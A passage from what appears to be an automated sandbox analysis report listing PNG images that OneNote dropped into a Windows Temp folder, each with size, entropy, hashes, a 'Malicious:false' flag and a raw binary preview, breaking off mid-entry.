                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{37C9769C-C2D9-4271-99DC-40B23ACB8BD8}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3804EE65-65E3-499A-8E6E-CD9BBD13400F}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{38F976EB-BF4C-4FEB-8DA6-06CB932BD6A1}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1657
                                                                                                                                            Entropy (8bit):7.80882577056055
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                            MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                            SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                            SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                            SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3AEACBEE-0F77-406A-BF78-DA99E3D25C08}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3BE3D15F-2717-4DEA-A42D-DFC84C748712}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4847
                                                                                                                                            Entropy (8bit):7.950192613458318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                            MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                            SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                            SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                            SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3C39F99D-A55B-48A2-87B3-C95BF8E5AC42}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3C709C83-1B04-4EFE-8DB9-962EBFE926AE}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3D88662A-A832-4CAE-AAF8-769BF49D6BF7}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3E379CFC-9DAA-403B-BF23-B29ACF906FF7}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3E72B350-28FD-4B45-B3B3-67C6D2AEBB10}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3EA8C040-8756-45C7-9536-1EDEAF16A33D}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19235
                                                                                                                                            Entropy (8bit):7.944867159042578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3EBE6D5E-EDEC-49D2-9088-00330D2D774B}.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Temp\{3EEDEA4B-8396-4B96-8E02-D3577749AFBE}

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
